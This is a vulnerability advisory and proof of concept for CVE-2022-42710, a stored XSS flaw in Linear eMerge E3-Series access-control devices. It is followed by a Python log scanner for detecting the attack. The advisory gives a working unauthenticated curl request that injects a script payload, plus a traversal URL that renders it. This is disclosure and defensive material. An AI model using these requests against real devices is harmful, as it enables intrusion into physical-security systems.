
CVE-2022-42710: Security-Research/CVE-2022-42710.txt at main · omarhashem123/Security-Research

Nice (formerly Nortek) Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e devices are vulnerable to Stored Cross-Site Scripting (XSS).


# Exploit Title: Nortek Linear eMerge E3-Series - Stored XSS

# Exploit Author: Omar Hashim

# Versions: 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, 0.32-08e

# Vendor home page: https://na.niceforyou.com/brands/linear/

# Vendor home page: https://www.nortekcontrol.com/access-control/

# Vendor home page: https://linear-solutions.com/

# Authentication Required: No

# CVE : CVE-2022-42710

# Description

====================

Nice (formerly Nortek) Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e devices are vulnerable to Stored Cross-Site Scripting (XSS).

# Proof Of Concept:

====================

You can find the research here

Research: https://omar0x01.medium.com/cve-2022-42710-a-journey-through-xxe-to-stored-xss-851d74dfe917

Steps with curl:

1- Upload the XSS Payload

curl -i -s -k -X $'POST' \
-H $'Host: <HOST:PORT>' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 203' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'<?xml version=\"1.0\"?>\x0d\x0a<xml><orientations><orientation>L</orientation><background><![CDATA[\'><script>alert(document.domain);</script><img alt=\"Image not exist\" src=\'x]]></background></orientations></xml>' \
$'http://<HOST:PORT>/badging/person_funct.php'

2- In the response you will find http://127.0.0.1/badging/…/user_img/<TimeStamp-will-be-printed-here>.jpg (e.g. http://127.0.0.1/…/user_img/20221001190845.jpg)

3- Copy the TimeStamp

4- http://<HOST:PORT>/badging/badge_template_print.php?idt=1&tpl=…/…/user_img/<Paste-timestamp-here>.jpg (e.g. http://<HOST:PORT>/badging/badge_template_print.php?idt=1&tpl=…/…/user_img/20221001190845.jpg)

5- The alert pop-up appears

Exploit script:

https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-42710
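For defenders, the following is an added example (not part of the original advisory or the author's exploit script) that triages a web access log for the two requests in the steps above: a POST to person_funct.php and a badge_template_print.php request whose tpl parameter references a timestamped file under user_img. The "combined" log format, the sample lines, the benign tpl value and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in "combined" access-log format (format and values are assumptions).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Oct/2022:19:08:45 +0000] "POST /badging/person_funct.php HTTP/1.1" 200 312 "-" "curl/7.85.0"
203.0.113.5 - - [01/Oct/2022:19:09:02 +0000] "GET /badging/badge_template_print.php?idt=1&tpl=user_img%2F20221001190845.jpg HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
203.0.113.6 - - [01/Oct/2022:19:09:40 +0000] "GET /badging/badge_template_print.php?idt=1&tpl=user_img%252F20221001190845.jpg HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Oct/2022:19:10:11 +0000] "GET /badging/badge_template_print.php?idt=1&tpl=default HTTP/1.1" 200 1502 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Oct/2022:19:11:30 +0000] "GET /index.php HTTP/1.1" 200 901 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} ')
UPLOAD_PATH = "/badging/person_funct.php"          # step 1 endpoint
PRINT_PATH = "/badging/badge_template_print.php"   # step 4 endpoint
# Uploaded files are named with a 14-digit timestamp, e.g. user_img/20221001190845.jpg
UPLOADED_IMG = re.compile(r"user_img/\d{14}\.jpg", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded separators (%252F) are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_text):
    """Return a list of (line_number, client_ip, reason) for requests worth reviewing."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        if m["method"] == "POST" and url.path == UPLOAD_PATH:
            # May be legitimate badging use; review source and authentication state.
            findings.append((n, m["ip"], "post-to-person_funct"))
        elif url.path == PRINT_PATH:
            # A template parameter pointing into the upload directory is the stronger signal.
            tpls = parse_qs(url.query).get("tpl", [])
            if any(UPLOADED_IMG.search(fully_decode(t)) for t in tpls):
                findings.append((n, m["ip"], "tpl-references-user_img"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the payload is stored and rendered for whoever opens the print URL, the client fetching badge_template_print.php may be a victim rather than the uploader, so review both finding types rather than correlating by source address alone.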
